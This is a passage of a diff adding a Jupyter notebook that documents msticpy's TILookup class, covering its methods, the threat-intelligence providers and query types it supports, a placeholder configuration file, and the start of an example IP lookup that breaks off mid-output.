+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:57:32.266387Z",
+     "start_time": "2019-09-25T04:57:25.562903Z"
+    },
+    "execution_event_id": "8bb96ca5-5051-4f08-853b-3461927f2e2d",
+    "last_executed_text": "# Imports\nimport sys\nimport warnings\n\nfrom msticpy.common.utility import check_py_version\nMIN_REQ_PYTHON = (3,6)\ncheck_py_version(MIN_REQ_PYTHON)\n\nfrom IPython import get_ipython\nfrom IPython.display import display, HTML, Markdown\nimport ipywidgets as widgets\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\nimport networkx as nx\n\nimport pandas as pd\npd.set_option('display.max_rows', 100)\npd.set_option('display.max_columns', 50)\npd.set_option('display.max_colwidth', 100)\n\nfrom msticpy.data import QueryProvider\nfrom msticpy.nbtools import *\nfrom msticpy.sectools import *\nfrom msticpy.nbtools.foliummap import FoliumMap\n\nWIDGET_DEFAULTS = {'layout': widgets.Layout(width='95%'),\n                   'style': {'description_width': 'initial'}}\n\n# Some of our dependencies (networkx) still use deprecated Matplotlib\n# APIs - we can't do anything about it so suppress them from view\nfrom matplotlib import MatplotlibDeprecationWarning\nwarnings.simplefilter(\"ignore\", category=MatplotlibDeprecationWarning)\n\n",
+    "persistent_id": "249a5400-e20e-452e-8d0d-2c65a8856bdf",
+    "scrolled": true,
+    "tags": []
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<hr><h4>Starting Notebook initialization...</h4>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "msticpy version installed: 1.0.0 latest published: 1.0.0<br>Latest version is installed.<br> <br>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "Processing imports.... <br>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "Imported: pd (pandas), IPython.get_ipython, IPython.display.display, IPython.display.HTML, IPython.display.Markdown, widgets (ipywidgets), pathlib.Path, plt (matplotlib.pyplot), matplotlib.MatplotlibDeprecationWarning, np (numpy), msticpy.data.QueryProvider, msticpy.nbtools.foliummap.FoliumMap, msticpy.common.utility.md, msticpy.common.utility.md_warn, msticpy.common.wsconfig.WorkspaceConfig, msticpy.datamodel.pivot.Pivot, msticpy.datamodel.entities <br>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "Checking configuration.... <br>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "Setting notebook options.... <br>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "<h4>Notebook initialization complete</h4>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Imports\n",
+    "import sys\n",
+    "import warnings\n",
+    "\n",
+    "from msticpy.common.utility import check_py_version\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "check_py_version(MIN_REQ_PYTHON)\n",
+    "\n",
+    "from msticpy import init_notebook\n",
+    "init_notebook(namespace=globals());\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# TILookup class\n",
+    "Input can be a single IoC observable or a pandas DataFrame containing\n",
+    "multiple observables. Processing may require a an API key and\n",
+    "processing performance may be limited to a specific number of\n",
+    "requests per minute for the account type that you have."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:57:32.290350Z",
+     "start_time": "2019-09-25T04:57:32.267365Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/markdown": "### Constructor\n",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Initialize TILookup instance.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        primary_providers : Optional[List[TIProvider]], optional\n",
+      "            Primary TI Providers, by default None\n",
+      "        secondary_providers : Optional[List[TIProvider]], optional\n",
+      "            Secondary TI Providers, by default None\n",
+      "        providers: Optional[List[str]], optional\n",
+      "            List of provider names to load, by default all available\n",
+      "            providers are loaded. To see the list of available providers\n",
+      "            call `TILookup.list_available_providers()`.\n",
+      "            Note: if primary_provides or secondary_providers is specified\n",
+      "            This will override the providers list.\n",
+      "\n",
+      "        \n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "### Attributes\n",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/markdown": "#### _add_provider()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Add a TI provider to the current collection.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        provider : TIProvider\n",
+      "            Provider instance\n",
+      "        name : str, optional\n",
+      "            The name to use for the provider (overrides the class name\n",
+      "            of `provider`)\n",
+      "        primary : bool, optional\n",
+      "            \"primary\" or \"secondary\" if False, by default \"primary\"\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _available_providers()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Return a list of builtin providers.\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        List[str]\n",
+      "            List of TI Provider classes.\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _browse_results()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Return TI Results list browser.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        data : pd.DataFrame\n",
+      "            TI Results data from TIProviders\n",
+      "        severities : Optional[List[str]], optional\n",
+      "            A list of the severity classes to show.\n",
+      "            By default these are ['warning', 'high'].\n",
+      "            Pass ['information', 'warning', 'high'] to see all\n",
+      "            results.\n",
+      "\n",
+      "        Other Parameters\n",
+      "        ----------------\n",
+      "        kwargs :\n",
+      "            passed to SelectItem constuctor.\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        SelectItem\n",
+      "            SelectItem browser for TI Data.\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _configured_providers()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Return a list of avaliable providers that have configuration details present.\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        List[str]\n",
+      "            List of TI Provider classes.\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _list_available_providers()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Print a list of builtin providers with optional usage.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        show_query_types : bool, optional\n",
+      "            Show query types supported by providers, by default False\n",
+      "        as_list : bool, optional\n",
+      "            Return list of providers instead of printing to stdout.\n",
+      "            Note: if you specify `show_query_types` this will be printed\n",
+      "            irrespective of this parameter setting.\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        Optional[List[str]]\n",
+      "            A list of provider names (if `return_list=True`)\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _loaded_providers()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Return dictionary of loaded providers.\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        Dict[str, TIProvider]\n",
+      "            [description]\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _lookup_ioc()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Lookup single IoC in active providers.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        observable : str\n",
+      "            IoC observable\n",
+      "            (`ioc` is also an alias for observable)\n",
+      "        ioc_type : str, optional\n",
+      "            One of IoCExtract.IoCType, by default None\n",
+      "            If none, the IoC type will be inferred\n",
+      "        ioc_query_type: str, optional\n",
+      "            The ioc query type (e.g. rep, info, malware)\n",
+      "        providers: List[str]\n",
+      "            Explicit list of providers to use\n",
+      "        prov_scope : str, optional\n",
+      "            Use \"primary\", \"secondary\" or \"all\" providers, by default \"primary\"\n",
+      "        kwargs :\n",
+      "            Additional arguments passed to the underlying provider(s)\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        Tuple[bool, List[Tuple[str, LookupResult]]]\n",
+      "            The result returned as a tuple(bool, list):\n",
+      "            bool indicates whether a TI record was found in any provider\n",
+      "            list has an entry for each provider result\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _lookup_iocs()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Lookup a collection of IoCs.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        data : Union[pd.DataFrame, Mapping[str, str], Iterable[str]]\n",
+      "            Data input in one of three formats:\n",
+      "            1. Pandas dataframe (you must supply the column name in\n",
+      "            `obs_col` parameter)\n",
+      "            2. Mapping (e.g. a dict) of [observable, IoCType]\n",
+      "            3. Iterable of observables - IoCTypes will be inferred\n",
+      "        obs_col : str, optional\n",
+      "            DataFrame column to use for observables, by default None\n",
+      "        ioc_type_col : str, optional\n",
+      "            DataFrame column to use for IoCTypes, by default None\n",
+      "        ioc_query_type: str, optional\n",
+      "            The ioc query type (e.g. rep, info, malware)\n",
+      "        providers: List[str]\n",
+      "            Explicit list of providers to use\n",
+      "        prov_scope : str, optional\n",
+      "            Use \"primary\", \"secondary\" or \"all\" providers, by default \"primary\"\n",
+      "        kwargs :\n",
+      "            Additional arguments passed to the underlying provider(s)\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        pd.DataFrame\n",
+      "            DataFrame of results\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _provider_status()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Return loaded provider status.\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        Iterable[str]\n",
+      "            List of providers and descriptions.\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _provider_usage()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Print usage of loaded providers.\n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _reload_provider_settings()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Reload provider settings from config.\n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _reload_providers()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Reload providers based on currrent settings in config.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        clear_keyring : bool, optional\n",
+      "            Clears any secrets cached in keyring, by default False\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    },
+    {
+     "data": {
+      "text/markdown": "#### _result_to_df()_",
+      "text/plain": "<IPython.core.display.Markdown object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Return DataFrame representation of IoC Lookup response.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        ioc_lookup : Tuple[bool, List[Tuple[str, LookupResult]]]\n",
+      "            Output from `lookup_ioc`\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        pd.DataFrame\n",
+      "            The response as a DataFrame with a row for each\n",
+      "            provider response.\n",
+      "\n",
+      "        \n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "# TILookup class\n",
+    "display(Markdown(\"### Constructor\\n\"))\n",
+    "print(TILookup.__init__.__doc__)\n",
+    "display(Markdown(\"### Attributes\\n\"))\n",
+    "for name in [att for att in dir(TILookup) if not att.startswith(\"_\")]:\n",
+    "    display(Markdown(f\"#### _{name}()_\"))\n",
+    "    print(getattr(TILookup, name).__doc__)\n",
+    "    print()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Available Providers\n",
+    "The **msticpy** TI Provider library can lookup IoCs in multiple providers.\n",
+    "\n",
+    "The list below shows the current set of providers."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:57:56.777457Z",
+     "start_time": "2019-09-25T04:57:32.291350Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "AzSTI\n",
+      "GreyNoise\n",
+      "OPR\n",
+      "OTX\n",
+      "Tor\n",
+      "VirusTotal\n",
+      "XForce\n"
+     ]
+    }
+   ],
+   "source": [
+    "TILookup.list_available_providers()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "You can view the list of supported query types for each provider with the `show_query_types=True` parameter"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "AzSTI\n",
+      "Azure Sentinel TI provider class. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "\tioc_type=file_hash\n",
+      "\tioc_type=hostname\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=ipv6\n",
+      "\tioc_type=linux_path\n",
+      "\tioc_type=md5_hash\n",
+      "\tioc_type=sha1_hash\n",
+      "\tioc_type=sha256_hash\n",
+      "\tioc_type=url\n",
+      "\tioc_type=windows_path\n",
+      "GreyNoise\n",
+      "GreyNoise Lookup. Supported query types:\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=ipv4, ioc_query_type=full\n",
+      "\tioc_type=ipv4, ioc_query_type=quick\n",
+      "OPR\n",
+      "Open PageRank Lookup. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "OTX\n",
+      "AlientVault OTX Lookup. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "\tioc_type=dns, ioc_query_type=geo\n",
+      "\tioc_type=dns, ioc_query_type=passivedns\n",
+      "\tioc_type=file_hash\n",
+      "\tioc_type=hostname\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=ipv4, ioc_query_type=geo\n",
+      "\tioc_type=ipv4, ioc_query_type=passivedns\n",
+      "\tioc_type=ipv6\n",
+      "\tioc_type=ipv6, ioc_query_type=geo\n",
+      "\tioc_type=ipv6, ioc_query_type=passivedns\n",
+      "\tioc_type=md5_hash\n",
+      "\tioc_type=sha1_hash\n",
+      "\tioc_type=sha256_hash\n",
+      "\tioc_type=url\n",
+      "Tor\n",
+      "Tor Exit Nodes Lookup. Supported query types:\n",
+      "\tioc_type=ipv4\n",
+      "VirusTotal\n",
+      "VirusTotal Lookup. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "\tioc_type=file_hash\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=md5_hash\n",
+      "\tioc_type=sha1_hash\n",
+      "\tioc_type=sha256_hash\n",
+      "\tioc_type=url\n",
+      "XForce\n",
+      "IBM XForce Lookup. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "\tioc_type=dns, ioc_query_type=malware\n",
+      "\tioc_type=dns, ioc_query_type=passivedns\n",
+      "\tioc_type=dns, ioc_query_type=whois\n",
+      "\tioc_type=file_hash\n",
+      "\tioc_type=hostname, ioc_query_type=whois\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=ipv4, ioc_query_type=malware\n",
+      "\tioc_type=ipv4, ioc_query_type=passivedns\n",
+      "\tioc_type=ipv4, ioc_query_type=rep\n",
+      "\tioc_type=ipv4, ioc_query_type=whois\n",
+      "\tioc_type=ipv6\n",
+      "\tioc_type=ipv6, ioc_query_type=malware\n",
+      "\tioc_type=ipv6, ioc_query_type=passivedns\n",
+      "\tioc_type=ipv6, ioc_query_type=rep\n",
+      "\tioc_type=ipv6, ioc_query_type=whois\n",
+      "\tioc_type=md5_hash\n",
+      "\tioc_type=sha1_hash\n",
+      "\tioc_type=sha256_hash\n",
+      "\tioc_type=url\n",
+      "\tioc_type=url, ioc_query_type=malware\n"
+     ]
+    }
+   ],
+   "source": [
+    "TILookup.list_available_providers(show_query_types=True)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Loading TIProviders\n",
+    "\n",
+    "Calling TILookup with no parameters will load all of the available providers\n",
+    "that have a configuration entry in `msticpyconfig.yaml` (see next section)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Attempting to sign-in with environment variable credentials...\n",
+      "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n",
+      "Please wait. Loading Kqlmagic extension...\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": "<!DOCTYPE html>\n            <html><body>\n            <div style=''>\n            <b>F37E8N88Y</b>&nbsp;<a href='http://127.0.0.1:57586/webbrowser?url=http%3A//127.0.0.1%3A57586/files/.kqlmagic/temp_files/8177386c-f354-4685-ad91-84c7ae6c2998/popup_devicelogin.html%3Fkernelid%3D8177386c-f354-4685-ad91-84c7ae6c2998&kernelid=8177386c-f354-4685-ad91-84c7ae6c2998' style='padding: 2px 6px 2px 6px; color: #333333; background-color: #EEEEEE; border-top: 1px solid #CCCCCC; border-right: 1px solid #333333; border-bottom: 1px solid #333333; border-left: 1px solid #CCCCCC' target='popup_verification_url'>Copy code to clipboard and authenticate</a>\n            </div>\n            </body></html>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "<!DOCTYPE html>\n                            <html><body><script>\n\n                                // close authentication window\n                                if (kql_MagicUserCodeAuthWindow && kql_MagicUserCodeAuthWindow.opener != null && !kql_MagicUserCodeAuthWindow.closed) {\n                                    kql_MagicUserCodeAuthWindow.close()\n                                }\n                                // TODO: make sure, you clear the right cell. BTW, not sure it is a must to do any clearing\n\n                                // clear output cell\n                                Jupyter.notebook.clear_output(Jupyter.notebook.get_selected_index())\n\n                                // TODO: if in run all mode, move to last cell, otherwise move to next cell\n                                // move to next cell\n\n                            </script></body></html>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "<!DOCTYPE html>\n            <html><body>\n            <div style=''>\n            <a href='http://127.0.0.1:57586/webbrowser?url=http%3A//127.0.0.1%3A57586/files/.kqlmagic/temp_files/8177386c-f354-4685-ad91-84c7ae6c2998/popup__8ecf8077-cf51-4820-aadd-14040956f35d_at_loganalytics_schema.html%3Fkernelid%3D8177386c-f354-4685-ad91-84c7ae6c2998&kernelid=8177386c-f354-4685-ad91-84c7ae6c2998' style='padding: 2px 6px 2px 6px; color: #333333; background-color: #EEEEEE; border-top: 1px solid #CCCCCC; border-right: 1px solid #333333; border-bottom: 1px solid #333333; border-left: 1px solid #CCCCCC' target='popup__8ecf8077-cf51-4820-aadd-14040956f35d_at_loganalytics_schema'>popup schema 8ecf8077-cf51-4820-aadd-14040956f35d@loganalytics</a>\n            </div>\n            </body></html>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/plain": "['OTX - AlientVault OTX Lookup. (primary)',\n 'VirusTotal - VirusTotal Lookup. (primary)',\n 'XForce - IBM XForce Lookup. (primary)',\n 'GreyNoise - GreyNoise Lookup. (primary)',\n 'AzSTI - Azure Sentinel TI provider class. (primary)',\n 'OPR - Open PageRank Lookup. (secondary)']"
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# load all configured providers\n",
+    "ti_lookup = TILookup()\n",
+    "ti_lookup.provider_status\n",
+    "\n",
+    "# Restricting which providers get loaded\n",
+    "#ti_lookup = TILookup(providers=[\"VirusTotal\", \"XForce\"])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Configuration File\n",
+    "You can configure primary and secondary providers. \n",
+    "Primary providers are used by default.\n",
+    "\n",
+    "You may need to supply an authorization (API) key and in some cases a user ID for each provider.\n",
+    "\n",
+    "For LogAnalytics/Azure Sentinel providers, you will need the workspace ID and tenant ID and will need to authenticate in order to access the data (although if you have an existing authenticated connection with the same workspace/tenant, this connection will be re-used).\n",
+    "\n",
+    "The configuration file is read from the current directory.\n",
+    "\n",
+    "Alternatively, you can specify a location for this file in an environment variable `MSTICPYCONFIG`.\n",
+    "\n",
+    "If you need to create a config file, uncomment the lines in the following cell.<br>\n",
+    "### <font color=\"red\">Warning - this will overwrite a file of the same name in the current directory</font>\n",
+    "\n",
+    "Delete any provider entries that you do not want to use and add the missing parameters for your providers. "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:57:56.781478Z",
+     "start_time": "2019-09-25T04:57:56.778478Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "# %%writefile msticpyconfig.yaml\r\n",
+    "# QueryDefinitions:\r\n",
+    "\r\n",
+    "# TIProviders:\r\n",
+    "#   OTX:\r\n",
+    "#     Args:\r\n",
+    "#       AuthKey: \"your-otx-key\"\r\n",
+    "#     Primary: True\r\n",
+    "#     Provider: \"OTX\" # Explicitly name provider to override\r\n",
+    "#   VirusTotal:\r\n",
+    "#     Args:\r\n",
+    "#       AuthKey: \"your-vt-key\"\r\n",
+    "#     Primary: True\r\n",
+    "#     Provider: \"VirusTotal\"\r\n",
+    "#   XForce:\r\n",
+    "#     Args:\r\n",
+    "#       ApiID: \"your-xforce-id\"\r\n",
+    "#       AuthKey: \"your-xforce-key\"\r\n",
+    "#     Primary: True\r\n",
+    "#     Provider: \"XForce\"\r\n",
+    "#   GreyNoise:\r\n",
+    "#     Args:\r\n",
+    "#       AuthKey: \"\"\r\n",
+    "#     Primary: True\r\n",
+    "#     Provider: \"GreyNoise\"\r\n",
+    "#   AzureSentinel:\r\n",
+    "#     # Note if you do not specify any settings in the Args key for the AzureSentinel\r\n",
+    "#     # provider, it will default to using your default Azure Sentinel workspace.\r\n",
+    "#     Args:\r\n",
+    "#       WorkspaceID: \"your-azure-sentinel-workspace-id\"\r\n",
+    "#       TenantID: \"your-azure-sentinel-tenant-id\"\r\n",
+    "#     Primary: True\r\n",
+    "#     Provider: \"AzSTI\""
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-17T23:08:31.871974Z",
+     "start_time": "2019-09-17T23:08:31.854984Z"
+    }
+   },
+   "source": [
+    "Reload providers to pick up new settings"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:57:57.200981Z",
+     "start_time": "2019-09-25T04:57:56.782454Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Settings reloaded. Use reload_providers to update settings for loaded providers.\n",
+      "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": "['OTX - AlientVault OTX Lookup. (primary)',\n 'VirusTotal - VirusTotal Lookup. (primary)',\n 'XForce - IBM XForce Lookup. (primary)',\n 'GreyNoise - GreyNoise Lookup. (primary)',\n 'AzSTI - Azure Sentinel TI provider class. (primary)',\n 'OPR - Open PageRank Lookup. (secondary)']"
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ti_lookup.reload_providers()\n",
+    "ti_lookup.provider_status"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Looking up IoCs"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### lookup_ioc\n",
+    "To lookup a single IoC.\n",
+    "```\n",
+    "ti_lookup.lookup_ioc(\n",
+    "    observable: str = None,\n",
+    "    ioc_type: str = None,\n",
+    "    ioc_query_type: str = None,\n",
+    "    providers: List[str] = None,\n",
+    "    prov_scope: str = 'primary',\n",
+    "    **kwargs,\n",
+    ") -> Tuple[bool, List[Tuple[str, msticpy.sectools.tiproviders.ti_provider_base.LookupResult]]]\n",
+    "\n",
+    "Lookup single IoC in active providers.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "observable : str\n",
+    "    IoC observable\n",
+    "    (`ioc` is also an alias for observable)\n",
+    "ioc_type : str, optional\n",
+    "    One of IoCExtract.IoCType, by default None\n",
+    "    If none, the IoC type will be inferred\n",
+    "ioc_query_type: str, optional\n",
+    "    The ioc query type (e.g. rep, info, malware)\n",
+    "providers: List[str]\n",
+    "    Explicit list of providers to use\n",
+    "prov_scope : str, optional\n",
+    "    Use primary, secondary or all providers, by default \"primary\"\n",
+    "kwargs :\n",
+    "    Additional arguments passed to the underlying provider(s)\n",
+    "\n",
+    "Returns\n",
+    "-------\n",
+    "Tuple[bool, List[Tuple[str, LookupResult]]]\n",
+    "    The result returned as a tuple(bool, list):\n",
+    "    bool indicates whether a TI record was found in any provider\n",
+    "    list has an entry for each provider result\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:57:57.204979Z",
+     "start_time": "2019-09-25T04:57:57.203002Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "# Uncomment this and run to see the document string\n",
+    "# ti_lookup.lookup_ioc?"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Lookup an IoC from a single provider\n",
+    "And show the output"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:57:59.999072Z",
+     "start_time": "2019-09-25T04:57:57.205979Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>Ioc</th>\n      <th>IocType</th>\n      <th>QuerySubtype</th>\n      <th>Provider</th>\n      <th>Result</th>\n      <th>Severity</th>\n      <th>Details</th>\n      <th>RawResult</th>\n      <th>Reference</th>\n      <th>Status</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>XForce</th>\n      <td>52.183.120.194</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>warning</td>\n      <td>{'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...</td>\n      <td>{'ip': '52.183.120.194', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 